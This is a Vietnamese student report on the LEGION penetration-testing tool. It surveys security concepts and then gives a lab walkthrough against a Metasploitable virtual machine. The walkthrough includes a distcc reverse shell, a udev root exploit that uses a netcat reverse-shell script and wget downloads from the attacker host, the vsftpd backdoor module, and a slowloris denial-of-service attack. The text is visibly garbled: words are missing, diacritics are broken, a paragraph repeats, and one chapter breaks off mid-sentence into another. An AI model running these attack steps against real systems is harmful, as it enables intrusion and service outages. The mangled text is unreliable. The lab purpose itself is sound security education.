Mục tiêu của Pentest là giúp tổ chức phát hiện càng nhiều lỗ hổng càng tốt, từ đó khắc phục chúng để loại trừ khả năng bị tấn công trong tương lai. Người làm công việc kiểm tra xâm nhập được gọi là pentester Pentest có thể được thực hiện trên hệ thống máy tính, web app, mobile app, hạ tầng mạng, IoT, ứng dụng và hạ tầng cloud, phần mềm dịch vụ SaaS, API, source code, hoặc một đối tượng IT có kết nối với internet và có khả năng bị tấn công … nhưng phổ biến nhất là pentest web app và mobile app. Những thành phần trên được gọi là đối tượng kiểm thử (pentest target). Ngày nay, dưới sự phát triển của công nghệ, kiểm tra thâm nhập đã trở thành một môđun không thể thiếu trong hệ thống an toàn thông tin của nhiều doanh nghiệp. Bài báo cáo dưới đây chúng em xin phép trình bày những thông tin mà chúng em thu thập được về công cụ LEGION trong Kali Linux và thử nghiệm công cụ này trên các hệ thống thực
HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng nâng cao Nhóm lớp: 02 Đề tài: Tìm hiểu cơng cụ LEGION Giảng viên hướng dẫn: TS Đặng Minh Tuấn Hà Nội, 6/2021 MỤC LỤC DANH MỤC TỪ VIẾT TẮT DANH MỤC HÌNH VẼ LỜI MỞ ĐẦU CHƯƠNG 1: TỔNG QUAN VỀ AN NINH MẠNG VÀ LỖ HỔNG BẢO MẬT Một số khái niệm liên quan đến an ninh mạng Một số khái niệm liên quan đến lỗ hổng bảo mật Phân loại lỗ hổng bảo mật Một số phương thức công mạng 4.1 Browser Attacks (Tấn cơng vào trình duyệt) 4.2 Malware Attacks (Tấn công mã độc) 4.3 DoS Attacks (Tấn công từ chối dịch vụ) 4.4 SQL Injection (Tấn công chèn mã SQL) 10 4.5 Kiểu công mạng khác 11 CHƯƠNG 2: TỔNG QUAN VỀ CÔNG CỤ LEGION 12 Giới thiệu nhóm cơng cụ thu thập thông tin (Information Gathering) 12 Giới thiệu nhóm cơng cụ phân tích lỗ hổng (Vulnerability Analysis) 14 Giới thiệu công cụ LEGION 18 So sánh với công cụ SPARTA 20 Cài đặt 21 Hướng dẫn sử dụng công cụ LEGION 27 CHƯƠNG 3: THỬ NGHIỆM CÔNG CỤ LEGION 34 Cơ sở lý thuyết 34 1.1 Nikto 34 1.2 Hydra 36 1.3 Nmap 37 Thử nghiệm 39 2.1 Rà quét lỗ hổng Metasploitable công cụ LEGION 39 2.2 Leo thang đặc quyền cách khai thác lỗ hổng DistCC Udev (CVE2004-2687 CVE-2009-1185) 44 2.3 Leo thang đặc quyền cách khai thác lỗ hổng VSFTPD (CVE-20112523) 52 2.4 Thực công DOS cách khai thác lỗ hổng MSF: AUXILIARY/DOS/HTTP/SLOWLORIS 54 KẾT LUẬN 57 DANH MỤC TÀI LIỆU THAM KHẢO Error! Bookmark not defined DANH MỤC TỪ VIẾT TẮT Từ viết tắt API Thuật ngữ tiếng anh Application Programming Thuật ngữ tiếng việt Giao thức lập trình ứng dụng Interface Giao diện cho phép máy chủ CGI Common Gateway Interface web thực thi chương trình bên ngồi Common Vulnerabilities and Hệ thống lỗ hổng khai thác Exposures phổ biến DDoS Distributed Denial of Service Tấn công từ chối dịch vụ phân tán DNS Domain Name Servers Hệ thống phân giải tên miền DoS Denial of Service Tấn công từ chối dịch vụ FTP File Transfer Protocol Giao thức truyền tập tin GPL General Public License Giấy phép công cộng HTML Hyper Text Markup Language Ngôn ngữ đánh dấu siêu văn HTTP Hypertext Transfer Protocol Giao thức vận chuyển siêu văn Hypertext Transfer Protocol Giao thức vận chuyển bảo mật siêu Secure văn Internet Protocol Giao thức mạng Lightweight Directory Access Giao thức truy cập dịch vụ thư Protocol mục National Security Agency Cơ quan an ninh quốc gia (Mỹ) Operating System Hệ điều hành CVE HTTPS IP LDAP NSA OS OWASP PCI RASP RPC Open Web Application Security Project Payment Card Industry Dự án bảo mật ứng dụng web mở Tiêu chuẩn bảo mật toán Runtime application self- Tự bảo vệ ứng dụng thời gian thực protection Remote Procedure Calls Thủ tục gọi hàm từ xa SCADA SCAP SMTP SNMP Supervisory Control And Data Hệ thống điều khiển giám sát Acquisition thu thập liệu Security Content Automation Giao thức tự động hóa nội dung Protocol bảo mật Simple Mail Transfer Protocol Simple Network Management Protocol Giao thức truyền tải thư đơn giản Giao thức quản lý mạng đơn giản SQL Structured Query Language Ngôn ngữ truy vấn cấu trúc SQLi SQL Injection Tấn công chèn mã SQL SSH Secure Shell Shell bảo mật TCP Transmission Control Protocol Giao thức điều khiển giao vận WAF Web Application Firewall Tường lửa ứng dụng web XML eXtensible Markup Language Ngôn ngữ đánh dấu mở rộng XSS Cross-site scripting Kỹ thuật công chèn mã XXE XML external entity Thực tể nằm XML DANH MỤC HÌNH VẼ Hình 1 Tấn cơng vào trình duyệt Hình Tấn cơng mã độc Hình Tấn cơng từ chối dịch vụ 10 Hình Tấn cơng chèn mã SQL 11 Hình Information Gathering 12 Hình 2 Nhóm cơng cụ Information Gathering 14 Hình Vulnerability Analysis 15 Hình Nhóm công cụ Vulnerability Analysis 18 Hình Thơng tin GoVanguard 19 Hình Công cụ SPARTA 20 Hình Cài đặt công cụ LEGION 21 Hình Clone source từ GitHub 22 Hình cd vào thư mục LEGION 22 Hình 10 Nhập vào dịng lệnh sudo chmod +x startLegion.sh .22 Hình 11 Run LEGION 23 Hình 12 Giao diện LEGION 23 Hình 13 Click vào icon Kali Linux 24 Hình 14 Menu 24 Hình 15 Menu bao gồm công cụ 25 Hình 16 Danh mục công cụ 25 Hình 17 Click vào công cụ LEGION 26 Hình 18 Giao diện công cụ LEGION 26 Hình 19 Giao diện cơng cụ LEGION 27 Hình 20 Phần input 27 Hình 21 Phần output 28 Hình 22 Phần lưu process logs 28 Hình 23 Tab Scan 28 Hình 24 Tab Brute 29 Hình 25 Click vào icon 29 Hình 26 Màn thêm IP 30 Hình 27 Nơi nhập IP vào 30 Hình 28 Mode Selection 31 Hình 29 Easy Mode 31 Hình 30 Hard Mode 32 Hình 31 Additional Arguments 32 Hình 32 Các tab phần output 33 Hình 33 Các tab phần input 33 Hình Options Nikto 35 Hình Options Hydra 37 Hình 3 Options nmap 39 Hình Máy ảo Metasploitable 39 Hình Địa IP 40 Hình Dùng LEGION để quét IP 40 Hình Host quét 41 Hình Kết thu 41 Hình Quá trình quét 41 Hình 10 Tab Service 42 Hình 11 Tab Scripts 42 Hình 12 Tab Information 43 Hình 13 Tab CVEs 43 Hình 14 Tab Notes 43 Hình 15 Tab Screenshot 44 Hình 16 Tab mysql-default 44 Hình 17 Service DistCC 45 Hình 18 Mở Metasploit Framework 45 Hình 19 Sử dụng module set giá trị 46 Hình 20 Kiểm tra quyền 46 Hình 21 Kiểm tra phiên kernel 47 Hình 22 Tìm payload 48 Hình 23 Đọc payload 48 Hình 24 Tạo file "run" 49 Hình 25 Tạo symbolic link 49 Hình 26 Thư mục local 50 Hình 27 Tải file cần thiết 50 Hình 28 Compile file 8572.c 51 Hình 29 Tìm PID netlink 51 Hình 30 Kiểm tra quyền 52 Hình 31 Khởi động Metasploit Framework 52 Hình 32 Set giá trị 53 Hình 33 Tiến hành công 53 Hình 34 Kiểm tra quyền 53 Hình 35 Khởi động Metasploit Framework 54 Hình 36 Sử dụng module 55 Hình 37 Set giá trị RHOST 55 Hình 38 Tiến hành công 55 Hình 39 Các tiến trình máy nạn nhân 56 LỜI MỞ ĐẦU Với nhu cầu trao đổi thông tin cần thiết nay, bắt buộc quan, tổ chức phải hoà vào mạng toàn cầu Internet An tồn bảo mật thơng tin vấn đề quan trọng hàng đầu việc kết nối mạng nội quan, doanh nghiệp, tổ chức với Internet hay chí nhân với Ngày nay, biện pháp an tồn thơng tin cho máy tính cá nhân mạng nội nghiên cứu triển khai Tuy nhiên, thường xuyên xảy tình trạng như: hệ thống mạng bị công, tổ chức bị đánh cắp thông tin gây nên hậu vô nghiêm trọng Những vụ công nhằm vào hệ thống thuộc công ty lớn AT&T, IBM, trường đại học, quan nhà nước, tổ chức quân sự, ngân hàng, … xảy thường xuyên, đôi lúc xảy số vụ công với quy mô khổng lồ (có tới 100.000 máy tính bị cơng) Hơn số phần tảng băng trôi Một phần lớn vụ cơng khơng thơng báo nhiều lý do, số kể lo uy tín đơn giản người quản trị dự án khơng hay biết vụ công nhằm vào hệ thống họ Kiểm thử xâm nhập hay Pentest, viết tắt “Penetration Testing” hình thức đánh giá mức độ an tồn hệ thống IT cơng mô thực tế Hiểu đơn giản, Pentest cố gắng xâm nhập vào hệ thống để phát điểm yếu tiềm tàng hệ thống mà tin tặc khai thác gây thiệt hại Mục tiêu Pentest giúp tổ chức phát nhiều lỗ hổng tốt, từ khắc phục chúng để loại trừ khả bị công tương lai Người làm công việc kiểm tra xâm nhập gọi pentester Pentest thực hệ thống máy tính, web app, mobile app, hạ tầng mạng, IoT, ứng dụng hạ tầng cloud, phần mềm dịch vụ SaaS, API, source code, đối tượng IT có kết nối với internet có khả bị công … phổ biến pentest web app mobile app Những thành phần gọi đối tượng kiểm thử (pentest target) Ngày nay, phát triển công nghệ, kiểm tra thâm nhập trở thành mô-đun thiếu hệ thống an tồn thơng tin nhiều doanh nghiệp Bài báo cáo chúng em xin phép trình bày thông tin mà chúng em thu thập công cụ LEGION Kali Linux thử nghiệm công cụ hệ thống thực Bài báo cáo gồm phần: Chương 1: Tổng quan an ninh mạng lỗ hổng bảo mật Chương 2: Tổng quan công cụ LEGION Chương 3: Thử nghiệm công cụ LEGION CHƯƠNG 1: TỔNG QUAN VỀ AN NINH MẠNG VÀ LỖ HỔNG BẢO MẬT Một số khái niệm liên quan đến an ninh mạng An ninh mạng bảo đảm hoạt động không gian mạng không gây hại đến an ninh quốc gia, trật tự, an toàn xã hội, quyền lợi ích hợp pháp quan, tổ chức, cá nhân Bảo vệ an ninh mạng phòng ngừa, phát hiện, ngăn chặn xử lý hành vi xâm phạm an ninh mạng Không gian mạng mạng lưới kết nối sở hạ tầng công nghệ thông tin, bao gồm mạng viễn thông, mạng Internet, mạng máy tính, hệ thống thơng tin, hệ thống xử lý điều khiển thông tin, sở liệu: nơi người thực hành vi xã hội không bị giới hạn không gian thời gian Tội phạm mạng hành vi sử dụng không gian mạng, công nghệ thông tin phương tiện điện tử để thực tội phạm quy định Bộ luật Hình Tấn cơng mạng hành vi sử dụng không gian mạng, công nghệ thông tin phương tiện điện tử để phá hoại, gây gián đoạn hoạt động mạng viễn thông, mạng Internet, mạng máy tính, hệ thống thơng tin, hệ thống xử lý điều khiển thông tin, sở liệu, phương tiện điện tử [1] Một số khái niệm liên quan đến lỗ hổng bảo mật Trong an ninh mạng, lổ hổng bảo mật điểm yếu bị tội phạm mạng lợi dụng để truy cập trái phép vào hệ thống máy tính Theo định nghĩa Tổ chức Tiêu chuẩn hóa Quốc tế Ủy ban Kỹ thuật Điện Quốc Tế (ISO/IEC) công bố ISO 27005 lỗ hổng bảo mật “Điểm yếu tài sản nhóm tài sản bị khai thác nhiều đe dọa, tài sản thứ có giá trị tổ chức, hoạt động kinh doanh tính liên tục chúng, bao gồm nguồn thông tin hỗ trợ sứ mệnh tổ chức” [2] Lực lượng chuyên trách kỹ thuật Internet (IETF) đưa định nghĩa lỗ hổng bảo mật RFC 4949 sau: “Một lỗ hổng điểm yếu thiết kế, triển khai vận hành quản lý hệ thống bị lợi dụng để vi phạm sách bảo mật hệ thống” [3] Nhìn chung, định nghĩa lỗ hổng bảo mật tổ chức đưa xoay quanh việc khiếm khuyết hệ thống bao gồm phần cứng phần mềm tồn bị kẻ xấu lợi dụng để khai thác gây tổn hại cho tổ chức, cá nhân sở hữu Có nhiều nguyên nhân gây lỗ hổng bảo mật: lỗi thân hệ thống, người quản trị hệ thống không hiểu sâu sắc dịch vụ cung cấp người sử dụng có ý thức bảo mật click vào đường link lạ tải ứng dụng độc hại Lỗ hổng bảo mật có mức độ ảnh hưởng khác Có lỗ hổng ảnh hưởng đến chất lượng dịch vụ cung cấp có lổ hổng ảnh hưởng tới hệ thống làm ngưng trệ dịch vụ Phân loại lỗ hổng bảo mật Có nhiều tổ chức khác phân loại lỗ hổng đặc biệt Theo Bộ Quốc phòng Mĩ, loại lỗ hổng bảo mật hệ thống gồm: Các lỗ hổng loại A: Rất nguy hiểm Đe dọa tính tồn vẹn bảo mật hệ thống Cho phép người sử dụng bên truy cập bất hợp pháp vào hệ thống Gây việc phá hỏng toàn hệ thống Xuất hệ thống quản trị yếu khơng kiểm sốt cấu hình mạng Các lỗ hổng loại B: Có mức độ nguy hiểm trung bình Cho phép người sử dụng có thêm tác quyền hệ thống mà không cần thực bước kiểm tra tính hợp lệ Thường có ứng dụng, dịch vụ hệ thống Có thể dẫn đến việc hay rị rỉ thơng tin yêu cầu bảo mật Các lỗ hổng loại C: Có mức độ nguy hiểm thấp, ảnh hưởng đến chất lượng dịch vụ làm gián đoạn hệ thống Cho phép thực phương thức công từ chối dịch vụ (Dinal of Services) gọi tắt DoS Ít phá hỏng liệu hay cho phép quyền truy cập bất hợp pháp vào máy tính DoS hình thức cơng sử dụng giao thức tầng Internet giao thức TCP/IP để làm hệ thống ngưng trệ dẫn đến tình trạng hệ thống từ chối người sử dụng truy cập vào hệ thống cách hợp pháp thể bị kẻ cơng khai thác để thực thi lệnh server mà khơng cần phải qua q trình kiểm tra phân quyền Trước thực leo thang đặc quyền, khai thác lỗ hổng để tạo reverse shell từ máy nạn nhân máy cơng Bước 1: Kiểm tra máy nạn nhân có chạy DistCC không Kiểm tra xem kết có service “distccd” chạy khơng, có tức máy nạn nhân bị khai thác lỗ hổng DistCC Hình 17 Service DistCC Bước 2: Khai thác lỗ hổng DistCC để tạo reverse shell với quyền thấp (Low – Privileges) (CVE-2004-2687) Nhập msfconsole vào terminal để mở Metasploit Framework, sau nhập search distcc để tìm kiếm module khai thác lỗ hổng DistCC Hình 18 Mở Metasploit Framework Nhập use exploit/unix/misc/distcc_exec để sử dụng module này, sau xác định giá trị RHOST, LHOST PAYLOAD địa máy nạn nhân, địa máy công cmd/unix/reverse để tạo reverse shell từ máy nạn nhân máy cơng Hình 19 Sử dụng module set giá trị Sau nhập exploit để tiến hành cơng, công thành công ta tạo reverse shell máy công, ta nhập whoami kết trả “daemon”, “daemon” process ta chưa có quyền “root” Hình 20 Kiểm tra quyền Bước 3: Khai thác lỗ hổng Udev để leo thang đặc quyền (CVE-2009-1185) Udev phiên 1.4.1 trở xuống không kiểm tra nguồn gốc thơng điệp NETLINK có phải đến từ kernel space hay khơng, nên người dùng cục khai thác để leo thang đặc quyền cách gửi thông điệp NETLINK từ user space Udev 1.4.1 thường xuất Ubuntu 8.10 sử dụng Linux kernel 2.6 trở xuống, cần xác định phiên Linux kernel mà hệ thống nạn nhân sử dụng Tiếp tục nhập uname -a lsb_release -a vào reverse shell từ máy nạn nhân Kết trả máy nạn nhân sử dụng kernel 2.6.24 phiên Ubuntu 8.04 Hình 21 Kiểm tra phiên kernel Mở terminal Kali dùng searchsploit để tìm payload leo thang đặc quyền lợi dụng lỗ hổng kernel phiên lệnh searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6 Ở sử dụng file “linux/local/8572.c” Có thể nhập lệnh less /usr/share/exploitdb/exploits/linux/local/8572.c để xem mã nguồn file Hình 22 Tìm payload Hình 23 Đọc payload Mục tiêu ta upload file “8572.c” file script “run” có chứa netcat reverse shell lên thư mục /tmp máy nạn nhân Để làm điều cần phải tạo file script “run” lệnh nano /var/www/html/run Nhập vào nội dung #!/bin/bash nc 192.168.80.133 12345 -e /bin/bash với “192.168.80.133” địa máy công “12345” cổng mà lắng nghe máy cơng Hình 24 Tạo file "run" Sau tiến hành restart apache2, tạo symbolic link tới file “8572.c” lệnh service apache2 restart ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html Hình 25 Tạo symbolic link Lúc thư mục /var/www/html có file “run” thư mục “local”, máy mạng LAN truy cập file folder thơng qua địa http://192.168.80.133/local http://192.168.80.133/run Hình 26 Thư mục local Chuyển sang Low – Privileges Shell, nhập lệnh cd /tmp wget http://192.168.80.133/run wget http://192.168.80.133/local/8572.c để tải file “run” “8572.c” từ máy cơng Hình 27 Tải file cần thiết Nhập gcc -o exploit 8572.c để compile file “8572.c” Hình 28 Compile file 8572.c Khi chạy file “exploit” script “run” thực thi tạo reverse shell với quyền root máy cơng có địa IP, PORT mà xác định trước file “run” Để chạy file “exploit” phải truyền vào Process ID (PID) udevd netlink socket Chúng ta lấy PID cách chạy lệnh cat /proc/net/netlink PID có giá trị khác PID mà cần tìm kiếm Có thể xác nhận lại lệnh ps aux | grep udev PID kết trả lệnh lớn đơn vị so với kết lệnh Trong trường hợp PID cần tìm 2743 Hình 29 Tìm PID netlink Trước khai thác lỗ hổng lệnh /exploit 2743 cần phải khởi tạo listener máy công netcat: nc -lvp 12345 Kiểm tra đặc quyền cách nhập whoami, kết trả “root” leo thang đặc quyền thành cơng Hình 30 Kiểm tra quyền Vậy đạt kết mong muốn có quyền root 2.3 Leo thang đặc quyền cách khai thác lỗ hổng VSFTPD (CVE-2011-2523) VSFTPD viết tắt “Very Secure FTP Deamon”, FTP Server cho hệ thống Unix-like bao gồm Linux Vào tháng năm 2011, người ẩn danh upload phiên VSFTPD chứa backdoor lên server Vì mà vsftpd 2.3.4 tải khoảng 30/06/2011 – 03/07/2011 chứa backdoor cho phép mở shell cổng 6200/tcp Bước 1: Khởi động Metasploit Framework lệnh msfconsole Hình 31 Khởi động Metasploit Framework Bước 2: Lựa chọn module vsftpd_234_backdoor lệnh use exploit/unix/ftp/vsftpd_234_backdoor Sau tiến hành xác định RHOST địa máy nạn nhân lệnh set RHOST 129.168.80.134 Hình 32 Set giá trị Bước 3: Nhập exploit để tiến hành cơng Hình 33 Tiến hành công Bước 4: Kiểm tra đặc quyền lệnh whoami, kết trả “root” tức khai thác thành cơng Hình 34 Kiểm tra quyền Vậy leo thang đặc quyền thành công 2.4 Thực công DOS cách khai thác lỗ hổng MSF: AUXILIARY/DOS/HTTP/SLOWLORIS DOS tên đầy đủ tiếng Anh Denial of Service, dịch tiếng Việt từ chối dịch vụ Tấn công từ chối dịch vụ DoS công nhằm làm sập máy chủ mạng, khiến người dùng khác khơng thể truy cập vào máy chủ/mạng Kẻ công thực điều cách "tuồn" ạt traffic gửi thơng tin kích hoạt cố đến máy chủ, hệ thống mạng mục tiêu, từ khiến người dùng hợp pháp (nhân viên, thành viên, chủ tài khoản) truy cập dịch vụ, tài nguyên họ mong đợi Nạn nhân công DoS thường máy chủ web tổ chức cao cấp ngân hàng, doanh nghiệp thương mại, công ty truyền thông, trang báo, mạng xã hội… Ví dụ bạn nhập vào URL website vào trình duyệt, lúc bạn gửi u cầu đến máy chủ trang để xem Máy chủ xử lý số yêu cầu định khoảng thời gian, kẻ công gửi ạt nhiều yêu cầu đến máy chủ làm bị tải yêu cầu bạn không xử lý Đây kiểu “từ chối dịch vụ” làm cho bạn khơng thể truy cập đến trang Kẻ cơng sử dụng thư rác để thực công tương tự tài khoản email bạn Dù bạn có tài khoản email cơng ty hay dùng dịch vụ miễn phí Gmail bị giới hạn số lượng liệu tài khoản Bằng cách gửi nhiều email đến tài khoản bạn, kẻ cơng làm đầy hịm thư đến ngăn chặn bạn nhận mail khác Bước 1: Khởi động Metasploit framework lệnh msfconsole Hình 35 Khởi động Metasploit Framework Bước 2: Nhập use auxiliary/dos/http/slowloris để sử dụng module khai thác lỗ hổng Hình 36 Sử dụng module Bước 3: Xác định giá trị RHOST địa máy nạn nhân Hình 37 Set giá trị RHOST Bước 4: Nhập exploit để tiến hành cơng Hình 38 Tiến hành cơng Bước 5: Mở metasploitable2 lên nhập lệnh top để xem tài nguyên máy nạn nhân Hình 39 Các tiến trình máy nạn nhân Do công slowloris nên sau lúc, tiến trình Apache chiếm tồn tài ngun máy Chứng to thực thành công việc công DOS vào máy nạn nhân KẾT LUẬN Trong báo cáo trên, em trình bày tìm hiểu sơ lược an ninh mạng lỗ hổng bảo mật chương Em giới thiệu nhóm cơng cụ liên quan đến cơng cụ LEGION chương với bước cài đặt, hướng dẫn sử dụng công cụ LEGION cơng cụ vơ hữu ích pentest, hỗ trợ họ việc khám phá, trinh sát khai thác hệ thống thông tin Trong chương phần thử nghiệm, em sử dụng công cụ LEGION để rà quét lỗ hổng Metasploitable Và em kết hợp với cơng cụ Metasploit Framework để phân tích lỗ hổng quét từ trình Trong thời gian tới, em tiếp tục nghiêm cứu thêm cơng cụ LEGION để sử dụng công cụ việc kiểm thử hệ thống hiệu Em xin chân thành cảm ơn! References [1] Quốc Hội, Luật An Ninh Mạng, 2018 [2] ISO/IEC, "ISO/IEC 27005:2018 - Information technology — Security techniques — Information security risk management," 2018 [3] The IETF Trust, "RFC 4949 - Internet Security Glossary, Version 2," 2007 [4] Howkteam, "Phân tích lỗ hổng bảo mật (Vulnerability Analysis)," 2018 [Online] Available: https://www.howkteam.vn/course/41-dieu-tra-cac-khai-niem ky-thuat-dieu-tra/51-phan-tich-lo-hong-bao-matvulnerability-analysis-2799 [5] LIFARS, "Missing SPARTA in latest Kali Linux 2020.1? Try LEGION!,"2020.[Online].Available: https://www.howkteam.vn/course/41-dieu-tra cac-khai-niem ky-thuatdieu-tra/51-phan-tich-lo-hong-bao-mat-vulnerability-analysis-2799 [6] GeeksforGeek, "Legion Tool in Kali Linux," 2020 [Online] Available: https://www.geeksforgeeks.org/legion-tool-in-kali-linux/ [7] Gokulakrishna, "An Overview Of Network Penetration Testing Using Legion Framework," 2020 [Online] Available: https://www.csharpcorner.com/article/an-overview-of-network-penetration-testingusing-legion-framework/ [8] GoVanguard, "Getting Started with Using Legion," [Online] Available: https://govanguard.com/legion/#getting-started [9] HackingLoop, "Network Penetration Testing with Legion Framework,"2021.[Online].Available:https://www.hackingloops.com/le gion-framework/ [10] K Linux, "Legion Test Web Application Vulnerability Automatically,"2020.[Online].Available:https://www.kalilinux.in/2020/ 09/legion-kali-linux.html